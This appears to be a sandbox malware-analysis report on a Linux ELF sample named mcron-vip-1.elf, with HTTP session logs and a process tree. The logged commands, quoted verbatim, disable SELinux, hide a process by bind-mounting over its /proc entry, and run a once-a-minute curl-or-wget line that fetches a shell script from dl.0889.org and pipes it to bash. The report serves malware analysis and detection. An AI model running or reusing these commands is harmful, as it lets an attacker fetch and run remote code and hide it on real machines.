                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            14192.168.2.145114820.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:12:53.083514929 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:12:54.241400957 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:12:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            15192.168.2.145115020.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:12:54.392009974 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:12:55.572721958 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:12:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            16192.168.2.145115220.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:13:53.058599949 CET95OUTGET /vip-1.sh HTTP/1.1
                            Host: dl.0889.org
                            User-Agent: curl/7.68.0
                            Accept: */*
                            Nov 2, 2024 10:13:54.233221054 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:13:54 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            Session IDSource IPSource PortDestination IPDestination Port
                            17192.168.2.145115420.56.16.380
                            TimestampBytes transferredDirectionData
                            Nov 2, 2024 10:13:54.372973919 CET158OUTGET /vip-1.sh HTTP/1.1
                            User-Agent: Wget/1.20.3 (linux-gnu)
                            Accept: */*
                            Accept-Encoding: identity
                            Host: dl.0889.org
                            Connection: Keep-Alive
                            Nov 2, 2024 10:13:55.526381016 CET306INHTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Sat, 02 Nov 2024 09:13:55 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                            System Behavior

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:/tmp/mcron-vip-1.elf
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "setenforce 0 &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "mount --bind /tmp/.c /proc/5489"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/mount
                            Arguments:mount --bind /tmp/.c /proc/5489
                            File size:55528 bytes
                            MD5 hash:92b20aa8b155ecd3ba9414aa477ef565

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:05:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:06:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:06:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:07:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:07:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:08:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:08:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:09:53
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:09:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:10:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:10:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:11:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:11:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:12:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:12:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/tmp/mcron-vip-1.elf
                            Arguments:-
                            File size:13016 bytes
                            MD5 hash:4e9526bcce8ad234b516a6cf30a4acc9

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:sh -c "(curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh || wget -q --timeout=10 -O - dl.0889.org/vip-1.sh) | bash &>/dev/null"
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/curl
                            Arguments:curl -fsSL --connect-timeout 10 dl.0889.org/vip-1.sh
                            File size:239848 bytes
                            MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                            Start time (UTC):09:13:54
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/wget
                            Arguments:wget -q --timeout=10 -O - dl.0889.org/vip-1.sh
                            File size:548568 bytes
                            MD5 hash:996940118df7bb2aaa718589d4e95c08

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/bin/sh
                            Arguments:-
                            File size:129816 bytes
                            MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                            Start time (UTC):09:13:52
                            Start date (UTC):02/11/2024
                            Path:/usr/bin/bash
                            Arguments:bash
                            File size:1183448 bytes
                            MD5 hash:7063c3930affe123baecd3b340f1ad2c

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/lib/udisks2/udisksd
                            Arguments:-
                            File size:483056 bytes
                            MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                            Start time (UTC):09:05:52
                            Start date (UTC):02/11/2024
                            Path:/usr/sbin/dumpe2fs
                            Arguments:dumpe2fs -h /dev/dm-0
                            File size:31112 bytes
                            MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4